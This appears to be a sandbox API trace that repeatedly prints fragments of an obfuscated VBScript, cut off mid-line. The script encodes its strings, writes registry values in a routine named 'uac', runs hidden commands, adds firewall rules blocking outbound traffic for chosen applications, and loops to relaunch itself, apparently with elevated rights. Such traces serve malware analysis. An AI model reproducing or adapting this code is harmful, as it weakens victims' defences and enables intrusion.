bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0223.019] wcsncmp (_String1="e = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0223.019] wcsncmp (_String1=" = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.020] wcsncmp (_String1="= str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0223.020] wcsncmp (_String1=" str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0223.020] wcsncmp (_String1="str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite 